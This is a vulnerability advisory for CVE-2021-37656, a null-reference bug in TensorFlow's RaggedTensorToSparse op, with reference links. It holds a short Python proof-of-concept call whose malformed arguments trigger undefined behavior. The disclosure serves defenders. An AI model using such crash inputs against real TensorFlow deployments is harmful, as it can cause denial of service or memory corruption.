CVE-2021-37656: Reference binding to nullptr in `RaggedTensorToSparse`
(updated )
An attacker can cause undefined behavior via binding a reference to null pointer in tf.raw_ops.RaggedTensorToSparse
:
import tensorflow as tf
tf.raw_ops.RaggedTensorToSparse(
rt_nested_splits=[[0, 38, 0]],
rt_dense_values=[])
References
- github.com/advisories/GHSA-4xfp-4pfp-89wg
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-569.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-767.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-278.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/1071f554dbd09f7e101324d366eec5f4fe5a3ece
- github.com/tensorflow/tensorflow/security/advisories/GHSA-4xfp-4pfp-89wg
- nvd.nist.gov/vuln/detail/CVE-2021-37656
Detect and mitigate CVE-2021-37656 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →